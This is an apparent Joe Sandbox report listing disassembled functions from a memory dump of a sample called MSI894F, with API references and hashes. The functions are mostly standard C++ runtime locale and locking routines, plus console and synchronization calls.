Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 014d88d0c622fd35f8e730e5d4d1c239ed3f9ce3fcff9b9f132b02ab1027af1b
Instruction ID: 25e00bf4f8d8b101eddaa30c6d153b478cf6158a156dc3ba6af327dc44385b39
Opcode Fuzzy Hash: 014d88d0c622fd35f8e730e5d4d1c239ed3f9ce3fcff9b9f132b02ab1027af1b
Instruction Fuzzy Hash: E801C035900619CBCF05EFA4D8566ADBBA1EF80321F280409EC11AB391DF749E099BB9

Function 00D5815A Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D58161
std::_Lockit::_Lockit.LIBCPMT ref: 00D5816B

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D581BC
std::_Lockit::~_Lockit.LIBCPMT ref: 00D581DC

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 2472b9c22222f4eed445cf377ef2e3e19ea491744282e2aee5a88529df829a9f
Instruction ID: a50a7e1a1ab8f61561662889194368f80a10159872fe69521023a51a5ab5da53
Opcode Fuzzy Hash: 2472b9c22222f4eed445cf377ef2e3e19ea491744282e2aee5a88529df829a9f
Instruction Fuzzy Hash: 4A01C4759007199BCF01EB64D856ABE77A1EF84321F240509FC11A7391CF749E069BB5

Function 00D526F9 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D52700
std::_Lockit::_Lockit.LIBCPMT ref: 00D5270A

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D5275B
std::_Lockit::~_Lockit.LIBCPMT ref: 00D5277B

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 0480ac034a5d5eee39b6853ebefb597c47ffd964b48aafcf499840c2d0e61964
Instruction ID: b2fc8f43bc71c9e69f17a8e0c2f6bde93d94be0e4e430d920784e7f2cae13f8e
Opcode Fuzzy Hash: 0480ac034a5d5eee39b6853ebefb597c47ffd964b48aafcf499840c2d0e61964
Instruction Fuzzy Hash: 4801C475900219DBCF05EB74D8566BD77A1EF89322F284109EC10A7391CF74DE099BB0

Function 00D5278E Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D52795
std::_Lockit::_Lockit.LIBCPMT ref: 00D5279F

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D527F0
std::_Lockit::~_Lockit.LIBCPMT ref: 00D52810

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 5882620e12b1885b1583baf6876ce28c6e8c4fba187f753f7a7c6f97bde7a24f
Instruction ID: 84c61bfa23068e34ffb6f5797d197b89ca0dff6260a1e964fb38a779b9dfd06d
Opcode Fuzzy Hash: 5882620e12b1885b1583baf6876ce28c6e8c4fba187f753f7a7c6f97bde7a24f
Instruction Fuzzy Hash: 1501C4359002199BCF05FBA4E8566BD7BA1EF85321F240509FC10AB3D1DF749E098BB0

Function 00D579C9 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D579D0
std::_Lockit::_Lockit.LIBCPMT ref: 00D579DA

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D57A2B
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57A4B

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 2a5df96167e0540b914c521c743bd859488d074ce69ed55b3a9ffd4ef4b4742d
Instruction ID: 8656a6b10f11424b868264cbae0128f713aa01c76763b9029bd390009438512a
Opcode Fuzzy Hash: 2a5df96167e0540b914c521c743bd859488d074ce69ed55b3a9ffd4ef4b4742d
Instruction Fuzzy Hash: 9001D2359002199BCF01EB64E8566BE7B61EF84322F290509FD24AB3D1CF749E058BB0

Function 00D639EB Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D639F2
std::_Lockit::_Lockit.LIBCPMT ref: 00D639FC

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D63A4D
std::_Lockit::~_Lockit.LIBCPMT ref: 00D63A6D

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 5976266a13160cf7826bd7c52a743995dc251dea880eecdf112644770fa1d28a
Instruction ID: cdc55c2f7792a21749286b766616c037532c83ff84bd074f405ea5fd1c5467e2
Opcode Fuzzy Hash: 5976266a13160cf7826bd7c52a743995dc251dea880eecdf112644770fa1d28a
Instruction Fuzzy Hash: 5001C076940219DBCF01EBA4D8566ADBBB2EF84320F280009F810AB391DF74DF059BB0

Function 00D57AF3 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D57AFA
std::_Lockit::_Lockit.LIBCPMT ref: 00D57B04

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D57B55
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57B75

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 0dea1e1b6f22cafe668ef3174e64fba8d6ea5179716e63e050ab9238605809c1
Instruction ID: 54311833410516817f352bd02bc893e8da6148a1e29709c47cc94c8fc43a2a33
Opcode Fuzzy Hash: 0dea1e1b6f22cafe668ef3174e64fba8d6ea5179716e63e050ab9238605809c1
Instruction Fuzzy Hash: D301C0319002198BCF01EF64E856AAE7771EF84321F290109ED14AB391CF749E058BB1

Function 00D63A80 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D63A87
std::_Lockit::_Lockit.LIBCPMT ref: 00D63A91

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D63AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 00D63B02

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: fd15649df6d808f5ee4705df114d3888d6b4612fca48c0c302498534756dbe5a
Instruction ID: 6454705a2d68bc19dd9b9b7f1cf1a51615418f15482201ee5e8cd41fc915dc76
Opcode Fuzzy Hash: fd15649df6d808f5ee4705df114d3888d6b4612fca48c0c302498534756dbe5a
Instruction Fuzzy Hash: 450180759002199BCF05FBA4D8566AD77A1EF84320F280509E815AB3D2DF74DE05DBB4

Function 00D57A5E Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D57A65
std::_Lockit::_Lockit.LIBCPMT ref: 00D57A6F

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D57AC0
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57AE0

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 2b0630be98f4e7466b84e2cda9071c546c51ca252366be59b1af2ca4c37045be
Instruction ID: 1862308d5a4761a9e4d18e745d385c039dc7e288c3966dbf72bef0f0633396f0
Opcode Fuzzy Hash: 2b0630be98f4e7466b84e2cda9071c546c51ca252366be59b1af2ca4c37045be
Instruction Fuzzy Hash: 9C01D2719002199BCF01EB64E8566AEBB61EF84321F29010AFC15AB3D1DF749E09CBB0

Function 00D57B88 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D57B8F
std::_Lockit::_Lockit.LIBCPMT ref: 00D57B99

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D57BEA
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57C0A

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 215f26d30860df8b9de420f362b50addf40a59a5dab0735951e9cd3795c32c26
Instruction ID: a7c8bedb58ee46a5600d51dc67b0b318734e853eaf5bdcbb9dd5cf333ae32591
Opcode Fuzzy Hash: 215f26d30860df8b9de420f362b50addf40a59a5dab0735951e9cd3795c32c26
Instruction Fuzzy Hash: 1E0180769002199BCF05EB64E8566BEB771EF84321F28450AEC10AB3D2DF749E05CBB4

Function 00D63CD4 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D63CDB
std::_Lockit::_Lockit.LIBCPMT ref: 00D63CE5

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D63D36
std::_Lockit::~_Lockit.LIBCPMT ref: 00D63D56

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 983952a8d95a1e1e0510e892100e173ae68244afc875562bd338c2df025806ac
Instruction ID: da584c0d64961a026268cbb706c586f73bd771537589a8a0e922b1f73879bee4
Opcode Fuzzy Hash: 983952a8d95a1e1e0510e892100e173ae68244afc875562bd338c2df025806ac
Instruction Fuzzy Hash: 0F018C759002199FCB05EF64E8566AE77A1EF85320F28050AE812AB391DFB49E058BB4

Function 00D63C3F Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D63C46
std::_Lockit::_Lockit.LIBCPMT ref: 00D63C50

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D63CA1
std::_Lockit::~_Lockit.LIBCPMT ref: 00D63CC1

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 0bd0c2aee4d1b96471a327b5db53aaead7bfee738278e2c039f1ab54466c67c3
Instruction ID: 96171e99703db0d5609a8b37c2e0c26cc710490fa0121c6d34ba631c46009428
Opcode Fuzzy Hash: 0bd0c2aee4d1b96471a327b5db53aaead7bfee738278e2c039f1ab54466c67c3
Instruction Fuzzy Hash: 200100318006199BCB01EBA4D8066ADB761EF84320F290009F811AB381CF74DE058BB0

Function 00D57E71 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D57E78
std::_Lockit::_Lockit.LIBCPMT ref: 00D57E82

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D57ED3
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57EF3

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 7dc93d72e561c62e1ca459b6c44b38a2a8d36d43921d2b54103a102bbbd2e842
Instruction ID: 9bda0fa1e9c71a58ca964276d6c13d60590ea70b3d93fc60c7f3441423c7c9e9
Opcode Fuzzy Hash: 7dc93d72e561c62e1ca459b6c44b38a2a8d36d43921d2b54103a102bbbd2e842
Instruction Fuzzy Hash: BF01D2759003199BCF02EF64E8566AE77A1EF84321F280449FC10AB3D1DF749E058BB4

Function 00D57F9B Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D57FA2
std::_Lockit::_Lockit.LIBCPMT ref: 00D57FAC

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D57FFD
std::_Lockit::~_Lockit.LIBCPMT ref: 00D5801D

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 06333ceabf5f44f9859bcd08db84d388e66fd79b30614bcc482486645a16c0f6
Instruction ID: 197d74402eff0fb7f5ea1214dbdf1835359e67584bfebfa55cd2f307094fa110
Opcode Fuzzy Hash: 06333ceabf5f44f9859bcd08db84d388e66fd79b30614bcc482486645a16c0f6
Instruction Fuzzy Hash: C301C075900219DBCF01EF64D8666AEB7A1EF84322F280109FC11AB3D1DF749E099BB0

Function 00D57F06 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D57F0D
std::_Lockit::_Lockit.LIBCPMT ref: 00D57F17

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D57F68
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57F88

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 1057df6511589b702375e812b3cbcca3eb48014c2ea7e7133a099741cb86941d
Instruction ID: 250887790ffa52a4e31f6c928e1ce1916e9db8a215055bed75041be35ba79718
Opcode Fuzzy Hash: 1057df6511589b702375e812b3cbcca3eb48014c2ea7e7133a099741cb86941d
Instruction Fuzzy Hash: CB01C031900219DBCF05EBA4E8566AEB761EF80321F284509FC10AB3D1DF749E058BB0

Function 00D55C66 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D55C6D
std::_Lockit::_Lockit.LIBCPMT ref: 00D55C78
std::_Lockit::~_Lockit.LIBCPMT ref: 00D55CE6

Part of subcall function 00D55DC8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D55DE0

std::locale::_Setgloballocale.LIBCPMT ref: 00D55C93

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: 359909f5b8764a54c17771940348e174cb21703be89eb895835c5b6dc2a03f04
Instruction ID: 319432c295023f35b10edc29128621474b9ec223638e8eb6b69d12929faa5e3e
Opcode Fuzzy Hash: 359909f5b8764a54c17771940348e174cb21703be89eb895835c5b6dc2a03f04
Instruction Fuzzy Hash: EA01BC75A00B109BCB06BB20E82553D7BA1FFC5301B180009EC1197381CF78AA0ACBF5

Function 00D88C76 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00D88643,?,00000001,?,?,?,00D87788,?,?,00000000), ref: 00D88C8D
GetLastError.KERNEL32(?,00D88643,?,00000001,?,?,?,00D87788,?,?,00000000,?,?,?,00D87D0F,?), ref: 00D88C99

Part of subcall function 00D88C5F: CloseHandle.KERNEL32(FFFFFFFE,00D88CA9,?,00D88643,?,00000001,?,?,?,00D87788,?,?,00000000,?,?), ref: 00D88C6F

___initconout.LIBCMT ref: 00D88CA9

Part of subcall function 00D88C21: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D88C50,00D88630,?,?,00D87788,?,?,00000000,?), ref: 00D88C34

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00D88643,?,00000001,?,?,?,00D87788,?,?,00000000,?), ref: 00D88CBE

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 91652d4082473172d68b42154893e457f0c974fc38b943308fbe2766267cdf22
Instruction ID: aaf6ca8376a4a3870930a93411bc8fc55d6a39cb055b49574fe6aa7393d0bbea
Opcode Fuzzy Hash: 91652d4082473172d68b42154893e457f0c974fc38b943308fbe2766267cdf22
Instruction Fuzzy Hash: 29F01536111269BBCF263F91DC0898A7F67FF497A0F544410FA19E52A0DA32D920EBB0

Function 00D678FD Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00D6789A,00000064), ref: 00D67920
LeaveCriticalSection.KERNEL32(00DA4AF8,?,?,00D6789A,00000064,?,?,00D425B6,00DA571C,7EBC463A,?,00000000,00D893ED,000000FF,?,00D41A26), ref: 00D6792A
WaitForSingleObjectEx.KERNEL32(?,00000000,?,00D6789A,00000064,?,?,00D425B6,00DA571C,7EBC463A,?,00000000,00D893ED,000000FF,?,00D41A26), ref: 00D6793B
EnterCriticalSection.KERNEL32(00DA4AF8,?,00D6789A,00000064,?,?,00D425B6,00DA571C,7EBC463A,?,00000000,00D893ED,000000FF,?,00D41A26), ref: 00D67942

Memory Dump Source

